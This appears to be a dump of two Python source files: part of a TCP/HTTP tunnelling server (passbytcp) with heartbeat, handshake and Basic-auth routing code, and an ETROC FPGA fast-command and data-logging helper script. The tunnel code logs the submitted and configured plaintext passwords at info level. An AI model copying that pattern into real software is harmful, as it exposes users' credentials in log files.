logging.info(\"master dispose {}\".format(self._stopped))\n # while len(self.slaver_pool):\n # slaver = self.slaver_pool.pop()\n # try:\n # slaver['addr_slaver'].shutdown(socket.SHUT_WR)\n # except Exception as e:\n # pass\n # try:\n # slaver['conn_slaver'].shutdown(socket.SHUT_WR)\n # except Exception as e:\n # pass\n # try:\n # slaver['addr_slaver'].close()\n # except Exception as e:\n # pass\n # try:\n # slaver['conn_slaver'].close()\n # except Exception as e:\n # pass\n # self.working_pool = None\n for sock in self._listening_sockets:\n try:\n sock.shutdown(socket.SHUT_RDWR)\n except Exception as e:\n pass\n try:\n sock.close()\n except Exception as e:\n pass\n self.thread_pool[\"socket_bridge\"] = None\n self.pending_customers = None\n\n def serve_forever(self):\n # if not self.external_slaver:\n # self.thread_pool[\"listen_slaver\"].start()\n # self.thread_pool[\"heart_beat_daemon\"].start()\n self.thread_pool[\"listen_customer\"].start()\n self.thread_pool[\"assign_slaver_daemon\"].start()\n self.thread_pool[\"socket_bridge\"] = self.socket_bridge.get_thread()\n\n # while True:\n # time.sleep(10)\n\n def try_bind_port(self,sock, addr):\n while not self._stopped['stop']:\n try:\n sock.bind(addr)\n except Exception as e:\n log.error((\n \"unable to bind {}, {}. 
If this port was used by the recently-closed shootback itself\\n\"\n \"then don't worry, it would be available in several seconds\\n\"\n \"we'll keep trying....\").format(addr, e))\n log.debug(traceback.format_exc())\n time.sleep(3)\n else:\n break\n\n def _transfer_complete(self, addr_customer):\n \"\"\"a callback for SocketBridge, do some cleanup jobs\"\"\"\n log.info(\"customer complete: {}\".format(addr_customer))\n del self.working_pool[addr_customer]\n\n def _serve_customer(self, conn_customer,):\n \"\"\"put customer and slaver sockets into SocketBridge, let them exchange data\"\"\"\n self.socket_bridge.add_conn_pair(\n conn_customer,\n functools.partial( # it's a callback\n # 这个回调用来在传输完成后删除工作池中对应记录\n self._transfer_complete,\n conn_customer.getpeername()\n )\n )\n\n def _send_heartbeat(self,conn_slaver):\n \"\"\"send and verify heartbeat pkg\"\"\"\n conn_slaver.send(self.pkg.pbuild_heart_beat().raw)\n\n pkg, verify = self.pkg.recv(\n conn_slaver, expect_ptype=CtrlPkg.PTYPE_HEART_BEAT) # type: CtrlPkg,bool\n\n if not verify:\n return False\n\n if pkg.prgm_ver < 0x000B:\n # shootback before 2.2.5-r10 use two-way heartbeat\n # so there is no third pkg to send\n pass\n else:\n # newer version use TCP-like 3-way heartbeat\n # the older 2-way heartbeat can't only ensure the\n # master --> slaver pathway is OK, but the reverse\n # communicate may down. So we need a TCP-like 3-way\n # heartbeat\n conn_slaver.send(self.pkg.pbuild_heart_beat().raw)\n\n return verify\n\n def _heart_beat_daemon(self):\n default_delay = 5 + SPARE_SLAVER_TTL // 12\n delay = default_delay\n log.info(\"heart beat daemon start, delay: {}s\".format(delay))\n while not self._stopped['stop']:\n time.sleep(delay)\n # log.debug(\"heart_beat_daemon: hello! im weak\")\n\n # ---------------------- preparation -----------------------\n slaver_count = len(self.slaver_pool)\n\n # logging.info(\"_heart_beat_daemon test {},{}\".format(id(self),self._stopped))\n\n if not slaver_count:\n log.warning(\"heart_beat_daemon: sorry, no slaver available, keep sleeping\")\n # restore default delay if there is no slaver\n delay = default_delay\n continue\n else:\n # notice this `slaver_count*2 + 1`\n # slaver will expire and re-connect if didn't receive\n # heartbeat pkg after SPARE_SLAVER_TTL seconds.\n # set delay to be short enough to let every slaver receive heartbeat\n # before expire\n delay = 1 + SPARE_SLAVER_TTL // max(slaver_count * 2 + 1, 12)\n\n # pop the oldest slaver\n # heartbeat it and then put it to the end of queue\n slaver = self.slaver_pool.popleft()\n addr_slaver = slaver[\"addr_slaver\"]\n\n # ------------------ real heartbeat begin --------------------\n start_time = time.perf_counter()\n try:\n hb_result = self._send_heartbeat(slaver[\"conn_slaver\"])\n except Exception as e:\n log.warning(\"error during heartbeat to {}: {}\".format(\n fmt_addr(addr_slaver), e))\n log.debug(traceback.format_exc())\n hb_result = False\n finally:\n time_used = round((time.perf_counter() - start_time) * 1000.0, 2)\n # ------------------ real heartbeat end ----------------------\n\n if not hb_result:\n log.warning(\"heart beat failed: {}, time: {}ms\".format(\n fmt_addr(addr_slaver), time_used))\n try_close(slaver[\"conn_slaver\"])\n del slaver[\"conn_slaver\"]\n\n # if heartbeat failed, start the next heartbeat immediately\n # because in most cases, all 5 slaver connection will\n # fall and re-connect in the same time\n delay = 0\n\n else:\n log.debug(\"heartbeat success: {}, time: {}ms\".format(\n fmt_addr(addr_slaver), time_used))\n 
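                # --- Hedged worked example of the delay formula above (the real
                # SPARE_SLAVER_TTL comes from common_func; assume 300s here):
                #   5 slavers -> delay = 1 + 300 // max(5*2 + 1, 12)
                #                      = 1 + 300 // 12 = 26s per round,
                # so each of the 5 slavers is heartbeated roughly every
                # 5 * 26 = 130s, safely inside the 300s expiry window.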
self.slaver_pool.append(slaver)\n\n def _handshake(self,conn_slaver):\n conn_slaver.send(self.pkg.pbuild_hs_m2s().raw)\n\n log.debug(\"CtrlPkg key{},{}\".format(self.pkg.SECRET_KEY_CRC32,self.pkg.SECRET_KEY_REVERSED_CRC32))\n\n buff = select_recv(conn_slaver, CtrlPkg.PACKAGE_SIZE, 2)\n if buff is None:\n return False\n\n pkg, verify = self.pkg.decode_verify(buff, CtrlPkg.PTYPE_HS_S2M) # type: CtrlPkg,bool\n\n log.debug(\"CtrlPkg from slaver {}: {}\".format(conn_slaver.getpeername(), pkg))\n\n return verify\n\n def _get_an_active_slaver(self):\n \"\"\"get and activate an slaver for data transfer\"\"\"\n try_count = 10\n while not self._stopped['stop']:\n try:\n logging.info(\"master _get_an_active_slaver self.slaver_pool:{},{}\".format(id(self.slaver_pool), self.slaver_pool))\n dict_slaver = self.slaver_pool.popleft()\n except:\n if try_count:\n time.sleep(0.02)\n try_count -= 1\n if try_count % 10 == 0:\n log.error(\"!!NO SLAVER AVAILABLE!! trying {}\".format(try_count))\n continue\n return None\n\n conn_slaver = dict_slaver[\"conn_slaver\"]\n\n try:\n hs = self._handshake(conn_slaver)\n except Exception as e:\n log.warning(\"Handshake failed: {},key:{},{},{},{}\".format(e,id(self),self.pkg.skey,self.pkg.SECRET_KEY_CRC32,self.pkg.SECRET_KEY_REVERSED_CRC32))\n log.debug(traceback.format_exc())\n hs = False\n\n if hs:\n return conn_slaver\n else:\n log.warning(\"slaver handshake failed: {}\".format(dict_slaver[\"addr_slaver\"]))\n try_close(conn_slaver)\n\n time.sleep(0.02)\n\n def _assign_slaver_daemon(self):\n while not self._stopped['stop']:\n conn_customer, addr_customer,tmp = self.pending_customers.get()\n\n self.working_pool[addr_customer] = {\n \"addr_customer\": addr_customer,\n \"conn_customer\": conn_customer\n }\n\n try:\n self._serve_customer(conn_customer)\n except:\n try:\n try_close(conn_customer)\n except:\n pass\n continue\n\n def _listen_customer(self):\n # if self.ssl:\n # context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n # context.load_cert_chain(certfile=https_service.pemfile, keyfile=https_service.keyfile)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.try_bind_port(sock, self.customer_listen_addr)\n sock.listen(20)\n self._listening_sockets.append(sock)\n log.info(\"Listening for customers: {}\".format(\n fmt_addr(self.customer_listen_addr)))\n while not self._stopped['stop']:\n conn_customer, addr_customer = sock.accept()\n # if self.ssl:\n # conn_customer = context.wrap_socket(conn_customer, server_side=True)\n log.info(\"Serving customer: {} Total customers: {}\".format(\n addr_customer, self.pending_customers.qsize() + 1\n ))\n\n # just put it into the queue,\n # let _assign_slaver_daemon() do the else\n # don't block this loop\n self.pending_customers.put((conn_customer, addr_customer,None))\n\n\nclass HttpBridge:\n def __init__(self,agre=\"http\"):\n self.conn_rd = set() # record readable-sockets\n self.fdmap={}\n self.map = {} # record sockets pairs\n self.callbacks = {} # record callbacks\n self.tmp_thread = None\n self.agre = agre\n\n self.hostdict = {}\n\n def updateconfig(self,host):\n if host is not None:\n self.hostdict = host\n\n def add_conn_pair(self, conn1, callback=None):\n self.conn_rd.add(conn1)\n\n logging.info(\"HttpBridge add_conn_pair con:{}\".format(conn1))\n\n # record callback\n if callback is not None:\n self.callbacks[conn1] = callback\n\n def get_thread(self):\n return self.tmp_thread\n\n def start_as_daemon(self):\n t = threading.Thread(target=self.start)\n t.daemon = True\n t.start()\n log.info(\"SocketBridge daemon 
started\")\n self.tmp_thread = t;\n # return t\n\n def start(self):\n server_pool.ServerPool.bridgeAdd += 1\n while True:\n try:\n self._start()\n except:\n log.error(\"FATAL ERROR! SocketBridge failed {}\".format(\n traceback.format_exc()\n ))\n\n def _start(self):\n # memoryview act as an recv buffer\n # refer https://docs.python.org/3/library/stdtypes.html#memoryview\n # buff = memoryview(bytearray(RECV_BUFFER_SIZE))\n while True:\n if not self.conn_rd:\n # sleep if there is no connections\n time.sleep(0.06)\n continue\n\n # blocks until there is socket(s) ready for .recv\n # notice: sockets which were closed by remote,\n # are also regarded as read-ready by select()\n r, w, e = select.select(self.conn_rd, [], [], 0.5)\n\n for s in r: # iter every read-ready or closed sockets\n try:\n # here, we use .recv_into() instead of .recv()\n # recv data directly into the pre-allocated buffer\n # to avoid many unnecessary malloc()\n # see https://docs.python.org/3/library/socket.html#socket.socket.recv_into\n buff = bytearray(RECV_BUFFER_SIZE)\n rec_len = s.recv_into(buff, RECV_BUFFER_SIZE)\n\n agre = self.agre\n buffdata = buff[:rec_len]\n infoss = buffdata.decode('utf-8')\n heads = httphead(infoss)\n logging.info(\"recv head:{}\".format(heads))\n url = agre + '://' + heads['Host']\n logging.info(\"hostdict PAN DUAN:{},len:{}\".format(url,len(self.conn_rd)))\n\n cfg = self.hostdict.get(url)\n logging.info(\"hostdict config url:{},cfg:{}\".format(url, cfg))\n auth = None\n if cfg:\n if cfg.get('username'):\n if heads.get('Authorization'):\n _,pwd = heads['Authorization'].split('Basic ')\n pwd = base64.b64decode(pwd)\n auth = cfg['username']+\":\"+cfg['password']\n logging.info(\"http password compare:{} - {}\".format(pwd.decode(\"utf-8\"),auth))\n if pwd.decode(\"utf-8\") == auth:\n auth = True\n else:\n auth = None\n else:\n auth = True\n else:\n self._rd_shutdown(s,False,0)\n continue\n if auth is True:\n portcfg = self.hostdict[url]\n loop = server_pool.ServerPool.get_instance().getloop\n dict = loop.getPortdict\n logging.info(\"http resend by url:{}\".format(url))\n # m1 = id(buff)\n # b2 = buff[:rec_len]\n # m2 = id(b2)\n # logging.info(\"地址比较:{},{}\".format(m1,m2))\n dict[str(portcfg['port'])].master.add_http_customer(s,s.getpeername(),buffdata)\n self.conn_rd.remove(s)\n # tosock = self.map[s]\n # self.conn_rd.remove(tosock)\n # self.map.pop(s)\n # self.map.pop(tosock)\n continue\n else:\n html = 'Tunnel %s not found' % heads['Host']\n header = \"HTTP/1.0 401 Unauthorised\" + \"\\r\\n\"\n header += \"Server: SokEvo/1.0\" + \"\\r\\n\"\n header += 'WWW-Authenticate: Basic realm=\"'+ heads['Host'] +'\"' + \"\\r\\n\"\n header += \"Content-Type: text/html\" + \"\\r\\n\"\n header += \"Content-Length: %d\" + \"\\r\\n\"\n header += \"\\r\\n\" + \"%s\"\n buf = header % (len(html.encode('utf-8')), html)\n s.send(buf.encode('utf-8'))\n logging.info(\"http resend fail url:{}\".format(url))\n # self._rd_shutdown(s,False,1)\n\n except Exception as e:\n # unable to read, in most cases, it's due to socket close\n self._rd_shutdown(s,False,2,e)\n continue\n\n if not rec_len:\n # read zero size, closed or shutdowned socket\n self._rd_shutdown(s,False,3)\n continue\n\n # try:\n # # send data, we use `buff[:rec_len]` slice because\n # # only the front of buff is filled\n # self.map[s].send(buff[:rec_len])\n # except Exception as e:\n # unable to send, close connection\n self._rd_shutdown(s,False,4)\n # continue\n\n def _rd_shutdown(self, conn, once=False,ff=False,e=False):\n \"\"\"action when connection 
should be read-shutdown\n :type conn: socket.SocketType\n \"\"\"\n\n logging.info(\"HttpBridge _rd_shutdown con:{} from:{} e:{}\".format(conn,ff,e))\n\n if conn in self.conn_rd:\n self.conn_rd.remove(conn)\n\n try:\n conn.shutdown(socket.SHUT_RD)\n except:\n pass\n\n if not once and conn in self.map: # use the `once` param to avoid infinite loop\n # if a socket is rd_shutdowned, then it's\n # pair should be wr_shutdown.\n self._wr_shutdown(self.map[conn], True)\n\n if self.map.get(conn) not in self.conn_rd:\n # if both two connection pair was rd-shutdowned,\n # this pair sockets are regarded to be completed\n # so we gonna close them\n self._terminate(conn)\n\n def _wr_shutdown(self, conn, once=False):\n \"\"\"action when connection should be write-shutdown\n :type conn: socket.SocketType\n \"\"\"\n try:\n conn.shutdown(socket.SHUT_WR)\n except:\n pass\n\n if not once and conn in self.map: # use the `once` param to avoid infinite loop\n # pair should be rd_shutdown.\n # if a socket is wr_shutdowned, then it's\n self._rd_shutdown(self.map[conn], True)\n\n def _terminate(self, conn):\n \"\"\"terminate a sockets pair (two socket)\n :type conn: socket.SocketType\n :param conn: any one of the sockets pair\n \"\"\"\n try_close(conn) # close the first socket\n\n server_pool.ServerPool.bridgeRemove += 1\n\n # ------ close and clean the mapped socket, if exist ------\n if conn in self.map:\n _mapped_conn = self.map[conn]\n try_close(_mapped_conn)\n if _mapped_conn in self.map:\n del self.map[_mapped_conn]\n\n del self.map[conn] # clean the first socket\n else:\n _mapped_conn = None # just a fallback\n\n # ------ callback --------\n # because we are not sure which socket are assigned to callback,\n # so we should try both\n if conn in self.callbacks:\n try:\n self.callbacks[conn]()\n except Exception as e:\n log.error(\"traceback error: {}\".format(e))\n log.debug(traceback.format_exc())\n del self.callbacks[conn]\n elif _mapped_conn and _mapped_conn in self.callbacks:\n try:\n self.callbacks[_mapped_conn]()\n except Exception as e:\n log.error(\"traceback error: {}\".format(e))\n log.debug(traceback.format_exc())\n del self.callbacks[_mapped_conn]\n","repo_name":"mxdg/passbytcp","sub_path":"server/master2.py","file_name":"master2.py","file_ext":"py","file_size_in_byte":22893,"program_lang":"python","lang":"en","doc_type":"code","stars":252,"dataset":"github-code","pt":"65"} +{"seq_id":"14864309523","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport time\r\n#import visa\r\nimport threading\r\nimport numpy as np\r\nimport matplotlib\r\nimport os\r\n# matplotlib.use('WebAgg')\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\r\nfrom queue import Queue\r\nfrom collections import deque\r\nimport queue\r\nfrom command_interpret import *\r\nfrom ETROC1_ArrayReg import *\r\nfrom translate_data import *\r\nimport datetime\r\n#========================================================================================#\r\n'''\r\n@author: Wei Zhang, Murtaza Safdari\r\n@date: 2023-03-24\r\nThis script is composed of all the helper functions needed for I2C comms, FPGA, etc\r\n'''\r\n#--------------------------------------------------------------------------#\r\ndef start_periodic_L1A_WS(cmd_interpret):\r\n ## 4-digit 16 bit hex, Duration is LSB 12 bits\r\n ## This tells us how many memory slots to use\r\n register_11(cmd_interpret, 0x0deb)\r\n time.sleep(0.01)\r\n\r\n ## 4-digit 16 bit hex, 0xWXYZ\r\n ## 
WX (8 bit) - Error Mask\r\n ## Y - trigSize[1:0],Period,testTrig\r\n ## Z - Input command\r\n register_12(cmd_interpret, 0x0030) # This is periodic Idle FC\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0032) # This is periodic BC Reset FC\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0000)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0035) # This is periodic Qinj FC\r\n cmd_interpret.write_config_reg(10, 0x0001)\r\n cmd_interpret.write_config_reg(9, 0x0001)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0036) # This is periodic L1A FC\r\n cmd_interpret.write_config_reg(10, 0x01f0)\r\n cmd_interpret.write_config_reg(9, 0x01ff)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret) # This initializes the memory and starts the FC cycles\r\n time.sleep(0.01)\r\n \r\ndef start_onetime_L1A_WS(cmd_interpret):\r\n ## 4-digit 16 bit hex, Duration is LSB 12 bits\r\n ## This tells us how many memory slots to use\r\n register_11(cmd_interpret, 0x0deb)\r\n time.sleep(0.01)\r\n\r\n ## 4-digit 16 bit hex, 0xWXYZ\r\n ## WX (8 bit) - Error Mask\r\n ## Y - trigSize[1:0],Period,testTrig\r\n ## Z - Input command\r\n register_12(cmd_interpret, 0x0000) # This is onetime Idle FC\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0002) # This is onetime BC Reset FC\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0000)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0005) # This is onetime Qinj FC\r\n cmd_interpret.write_config_reg(10, 0x0001)\r\n cmd_interpret.write_config_reg(9, 0x0001)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0006) # This is onetime L1A FC\r\n cmd_interpret.write_config_reg(10, 0x01f0)\r\n cmd_interpret.write_config_reg(9, 0x01ff)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret) # This initializes the memory and starts the FC cycles\r\n time.sleep(0.01)\r\n\r\ndef start_L1A(cmd_interpret):\r\n ## dec = 3564\r\n register_11(cmd_interpret, 0x0deb)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0030)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0032)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0000)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0035)\r\n cmd_interpret.write_config_reg(10, 0x0001)\r\n cmd_interpret.write_config_reg(9, 0x0001)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0036)\r\n cmd_interpret.write_config_reg(10, 0x01f9)\r\n cmd_interpret.write_config_reg(9, 0x01f9)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef start_L1A_1MHz(cmd_interpret):\r\n register_11(cmd_interpret, 0x0de7)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0030)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n 
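    # --- Hedged worked decode of the 0xWXYZ register_12 layout documented above,
    # taking the periodic-L1A key 0x0036 and reading Y's bits MSB->LSB as listed:
    #   WX = (0x0036 >> 8) & 0xFF = 0x00  -> error mask: nothing masked
    #   Y  = (0x0036 >> 4) & 0xF  = 0x3   -> trigSize=0b00, Period=1, testTrig=1
    #   Z  =  0x0036       & 0xF  = 0x6   -> input command 6 (the L1A FC)
    # The one-time L1A key 0x0006 differs only in Y, with Period/testTrig cleared.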
cmd_interpret.write_config_reg(9, 0x0de7)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n \r\n register_12(cmd_interpret, 0x0032)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0000)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n for index in range(89):\r\n register_12(cmd_interpret, 0x0035)\r\n cmd_interpret.write_config_reg(10, 0x0001 + index*40)\r\n cmd_interpret.write_config_reg(9, 0x0001 + index*40)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n register_12(cmd_interpret, 0x0036)\r\n cmd_interpret.write_config_reg(10, 0x019 + index*40)\r\n cmd_interpret.write_config_reg(9, 0x019 + index*40)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef start_L1A_trigger_bit(cmd_interpret):\r\n register_11(cmd_interpret, 0x0deb)\r\n\r\n time.sleep(0.01)\r\n\r\n # IDLE\r\n register_12(cmd_interpret, 0x0070)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n \r\n # BCR\r\n # register_12(cmd_interpret, 0x0072)\r\n # cmd_interpret.write_config_reg(10, 0x0000)\r\n # cmd_interpret.write_config_reg(9, 0x0000)\r\n # fc_init_pulse(cmd_interpret)\r\n # time.sleep(0.01)\r\n\r\n # QInj FC\r\n register_12(cmd_interpret, 0x0075)\r\n cmd_interpret.write_config_reg(10, 0x0005)\r\n cmd_interpret.write_config_reg(9, 0x0005)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n ### Send L1A\r\n register_12(cmd_interpret, 0x0076)\r\n cmd_interpret.write_config_reg(10, 0x01fd)\r\n cmd_interpret.write_config_reg(9, 0x01fd)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n\r\n time.sleep(0.01)\r\n\r\ndef start_L1A_trigger_bit_data(cmd_interpret):\r\n register_11(cmd_interpret, 0x0deb)\r\n\r\n time.sleep(0.01)\r\n\r\n # Idle\r\n register_12(cmd_interpret, 0x0070)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n \r\n # BCR\r\n register_12(cmd_interpret, 0x0072)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0000)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n \r\n fc_signal_start(cmd_interpret)\r\n\r\n time.sleep(0.01)\r\n \r\n\r\ndef start_L1A_train(cmd_interpret):\r\n\r\n ## Register 11, needs do_fc option\r\n ## 4-digit 16 bit hex, Duration\r\n register_11_key = 0x0021\r\n\r\n ## Register 12, needs do_fc option\r\n ## 4-digit 16 bit hex, 0xWXYZ\r\n ## WX (8 bit) - Error Mask\r\n ## Y - trigSize[1:0],Period,testTrig\r\n ## Z - Input command\r\n register_12_key = 0x0036\r\n register_11(cmd_interpret, key = register_11_key)\r\n register_12(cmd_interpret, key = register_12_key)\r\n fc_signal_start(cmd_interpret)\r\n software_clear_fifo(cmd_interpret) \r\n time.sleep(0.5)\r\n\r\n register_11_key = 0x0020\r\n register_12_key = 0x0035\r\n register_11(cmd_interpret, key = register_11_key)\r\n register_12(cmd_interpret, key = register_12_key)\r\n fc_signal_start(cmd_interpret)\r\n software_clear_fifo(cmd_interpret) \r\n\r\ndef stop_L1A(cmd_interpret):\r\n register_12(cmd_interpret, 0x0030)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n software_clear_fifo(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef 
stop_L1A_trigger_bit(cmd_interpret):\r\n register_12(cmd_interpret, 0x0070)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0deb)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n # software_clear_fifo(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef stop_L1A_1MHz(cmd_interpret):\r\n register_12(cmd_interpret, 0x0030)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0de7)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n software_clear_fifo(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef stop_L1A_1MHz_trigger_bit(cmd_interpret):\r\n register_12(cmd_interpret, 0x0070)\r\n cmd_interpret.write_config_reg(10, 0x0000)\r\n cmd_interpret.write_config_reg(9, 0x0de7)\r\n fc_init_pulse(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n fc_signal_start(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\n software_clear_fifo(cmd_interpret)\r\n time.sleep(0.01)\r\n\r\ndef stop_L1A_train(cmd_interpret):\r\n software_clear_fifo(cmd_interpret)\r\n\r\n register_11_key = 0x0021\r\n register_12_key = 0x0006\r\n register_11(cmd_interpret, key = register_11_key)\r\n register_12(cmd_interpret, key = register_12_key)\r\n fc_signal_start(cmd_interpret)\r\n software_clear_fifo(cmd_interpret) \r\n\r\n register_11_key = 0x0020\r\n register_12_key = 0x0005\r\n register_11(cmd_interpret, key = register_11_key)\r\n register_12(cmd_interpret, key = register_12_key)\r\n fc_signal_start(cmd_interpret)\r\n software_clear_fifo(cmd_interpret) \r\n\r\ndef link_reset(cmd_interpret):\r\n software_clear_fifo(cmd_interpret) \r\n\r\n# define a threading class for saving data from FPGA Registers only\r\nclass Save_FPGA_data(threading.Thread):\r\n def __init__(self, name, cmd_interpret, time_limit, overwrite, output_directory, isQInj, DAC_Val):\r\n threading.Thread.__init__(self, name=name)\r\n self.cmd_interpret = cmd_interpret\r\n self.time_limit = time_limit\r\n self.overwrite = overwrite\r\n self.output_directory = output_directory\r\n self.isQInj = isQInj\r\n self.DAC_Val = DAC_Val\r\n\r\n def run(self):\r\n if(self.isQInj):\r\n start_L1A_trigger_bit(self.cmd_interpret) # sending IDLE + QINJ FC + L1A FC\r\n else:\r\n stop_L1A_trigger_bit(self.cmd_interpret) # only sending IDLE FC \r\n t = threading.current_thread() # Local reference of THIS thread object\r\n t.alive = True # Thread is alive by default\r\n print(\"{} is saving FPGA data directly...\".format(self.getName()))\r\n total_start_time = time.time()\r\n userdefinedir = self.output_directory\r\n today = datetime.date.today()\r\n todaystr = \"../ETROC-Data/\" + today.isoformat() + \"_Array_Test_Results\"\r\n try:\r\n os.mkdir(todaystr)\r\n print(\"Directory %s was created!\"%todaystr)\r\n except FileExistsError:\r\n print(\"Directory %s already exists!\"%todaystr)\r\n userdefine_dir = todaystr + \"/%s\"%userdefinedir\r\n outfile = None\r\n try:\r\n os.mkdir(userdefine_dir)\r\n except FileExistsError:\r\n print(\"User defined directory %s already created!\"%(userdefine_dir))\r\n if(self.overwrite != True):\r\n outfile = open(\"./%s/FPGA_Data.dat\"%(userdefine_dir), 'a')\r\n else:\r\n if os.path.exists(\"./%s/FPGA_Data.dat\"%(userdefine_dir)):\r\n os.system(\"rm ./%s/FPGA_Data.dat\"%(userdefine_dir))\r\n outfile = open(\"./%s/FPGA_Data.dat\"%(userdefine_dir), 'w')\r\n if outfile is None:\r\n print(\"Outfile not set!\")\r\n sys.exit(1)\r\n sleep_time = self.time_limit\r\n if 
sleep_time < 3:\r\n sleep_time = 3\r\n if not t.alive:\r\n print(\"Check Link Thread detected alive=False\")\r\n time.sleep(sleep_time)\r\n read_register = self.cmd_interpret.read_config_reg(7)\r\n fpga_duration = int(format(read_register, '016b')[-6:], base=2)\r\n read_register = self.cmd_interpret.read_config_reg(8)\r\n en_L1A = format(read_register, '016b')[-11]\r\n fpga_data = int(format(self.cmd_interpret.read_status_reg(4), '016b')+format(self.cmd_interpret.read_status_reg(3), '016b'), base=2)\r\n fpga_header = int(format(self.cmd_interpret.read_status_reg(6), '016b')+format(self.cmd_interpret.read_status_reg(5), '016b'), base=2)\r\n fpga_state = int(format(self.cmd_interpret.read_status_reg(7), '016b'), base=2)\r\n fpga_triggerbit = int(format(self.cmd_interpret.read_status_reg(9), '016b')+format(self.cmd_interpret.read_status_reg(8), '016b'), base=2)\r\n outfile.write(f'{fpga_state},{en_L1A},{fpga_duration},{fpga_data},{fpga_header},{fpga_triggerbit},{self.DAC_Val}\\n')\r\n outfile.close()\r\n stop_L1A_trigger_bit(self.cmd_interpret)\r\n print(\"%s finished!\"%self.getName())\r\n#--------------------------------------------------------------------------#\r\n\r\n# define a receive data threading class\r\nclass Receive_data(threading.Thread):\r\n def __init__(self, name, queue, cmd_interpret, num_fifo_read, read_thread_handle, write_thread_handle, time_limit, use_IPC = False, stop_DAQ_event = None, IPC_queue = None):\r\n threading.Thread.__init__(self, name=name)\r\n self.queue = queue\r\n self.cmd_interpret = cmd_interpret\r\n self.num_fifo_read = num_fifo_read\r\n self.read_thread_handle = read_thread_handle\r\n self.write_thread_handle = write_thread_handle\r\n self.time_limit = time_limit\r\n self.use_IPC = use_IPC\r\n self.stop_DAQ_event = stop_DAQ_event\r\n self.IPC_queue = IPC_queue\r\n if self.use_IPC and self.IPC_queue is None:\r\n self.use_IPC = False\r\n if not self.use_IPC:\r\n self.daq_on = True\r\n if self.stop_DAQ_event is not None:\r\n self.stop_DAQ_event.set()\r\n else:\r\n self.daq_on = True\r\n 